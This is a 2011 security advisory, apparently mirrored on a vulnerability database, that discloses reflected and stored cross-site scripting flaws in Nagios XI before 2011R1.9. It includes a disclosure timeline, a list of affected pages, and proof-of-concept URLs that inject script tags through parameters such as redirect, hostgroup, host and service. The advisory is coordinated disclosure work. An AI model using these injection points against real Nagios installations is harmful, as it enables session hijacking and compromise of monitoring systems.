Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27460
HistoryDec 19, 2011 - 12:00 a.m.

0A29-11-3 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9

2011-12-1900:00:00
vulners.com
92
JSON

================
Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

Description:

Multiple XSS vulnerabilities exist within Nagios XI. It is entirely likely this
list is non-exhaustive, due to the sheer number of issues. Of particular note
is XSS on the login page, and the ability to pass XSS through the login page,
using the redirect parameter, e.g.
http://site/nagiosxi/login.php?redirect=nagiosxi/reports/histogram.php?service=&quot;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;

Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9

  • 12/07/2011)

================
Timeline:

16 November 2011 - Reported to Nagios Enterprises
16 November 2011 - Acknowledged
13 December 2011 - Nagios XI 2011R1.9 released
16 December 2011 - Nagios Enterprises report fixed
16 December 2011 - Public disclosure

================
Details:

Reflected XSS

Page: /nagiosxi/login.php
Variables: -
PoCs: http://site/nagiosxi/login.php/&quot;;alert&#40;&#39;0a29&#39;&#41;;&quot;
Details: The URL is copied into JavaScript variable 'backend_url' in an unsafe
manner
Also affects:
/nagiosxi/about/index.php
/nagiosxi/about/index.php
/nagiosxi/about/main.php
/nagiosxi/account/main.php
/nagiosxi/account/notifymethods.php
/nagiosxi/account/notifymsgs.php
/nagiosxi/account/notifyprefs.php
/nagiosxi/account/testnotification.php
/nagiosxi/help/index.php
/nagiosxi/help/main.php
/nagiosxi/includes/components/alertstream/go.php
/nagiosxi/includes/components/alertstream/index.php
/nagiosxi/includes/components/hypermap_replay/index.php
/nagiosxi/includes/components/massacknowledge/mass_ack.php
/nagiosxi/includes/components/xicore/recurringdowntime.php/
/nagiosxi/includes/components/xicore/status.php
/nagiosxi/includes/components/xicore/tac.php
/nagiosxi/reports/alertheatmap.php
/nagiosxi/reports/availability.php
/nagiosxi/reports/eventlog.php
/nagiosxi/reports/histogram.php
/nagiosxi/reports/index.php
/nagiosxi/reports/myreports.php
/nagiosxi/reports/nagioscorereports.php
/nagiosxi/reports/notifications.php
/nagiosxi/reports/statehistory.php
/nagiosxi/reports/topalertproducers.php
/nagiosxi/views/index.php
/nagiosxi/views/main.php

Page: /nagiosxi/account/
Variables: xiwindow
PoCs: http://site/nagiosxi/account/?xiwindow=&quot;&gt;&lt;/iframe&gt;&lt;script&gt;alert&#40;&#39;0a29&#39;&#41;&lt;/script&gt;

Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php
Variables: -
PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/&#39;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;

Page: /nagiosxi/includes/components/xicore/status.php
Variables: hostgroup, style
PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&amp;hostgroup=&#39;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;
http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&amp;hostgroup=all&amp;style=&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;

Page: /nagiosxi/includes/components/xicore/recurringdowntime.php
Variables: -
PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/&#39;;}}alert('0a29')</script>

Page: /nagiosxi/reports/alertheatmap.php
Variables: height, host, service, width
PoCs: http://site/nagiosxi/reports/alertheatmap.php?height=&quot;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;
http://site/nagiosxi/reports/alertheatmap.php?host=&quot;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;
http://site/nagiosxi/reports/alertheatmap.php?service=&quot;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;
http://site/nagiosxi/reports/alertheatmap.php?width=&quot;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;

Page: /nagiosxi/reports/histogram.php
Variable: service
PoCs: http://site/nagiosxi/reports/histogram.php?service=&quot;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;

Page: /nagiosxi/reports/notifications.php
Variables: host, service
PoCs: http://site/nagiosxi/reports/notifications.php?host=&quot;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;
http://site/nagiosxi/reports/notifications.php?service=&quot;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;

Page: /nagiosxi/reports/statehistory.php
Variables: host, service
PoCs: http://site/nagiosxi/reports/statehistory.php?host=&quot;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;
http://site/nagiosxi/reports/statehistory.php?service=&quot;&gt;&lt;script&gt;alert&#40;&quot;0a29&quot;&#41;&lt;/script&gt;

Stored XSS

Page: /nagiosxi/reports/myreports.php
Variable: title
Details: It is possible to store XSS within 'My Reports', however it
is believed this
is only viewable by the logged-in user.
1) View a report and save it, e.g.
http://site/nagiosxi/reports/myreports.php?add=1&amp;title=Availability+Summary&amp;url=&#37;2Fnagiosxi&#37;2Freports&#37;2Favailability.php&amp;meta_s=a&#37;3A0&#37;3A&#37;7B&#37;7D
2) Name the report with XSS, e.g. "><script>alert("0a29")</script>

JSON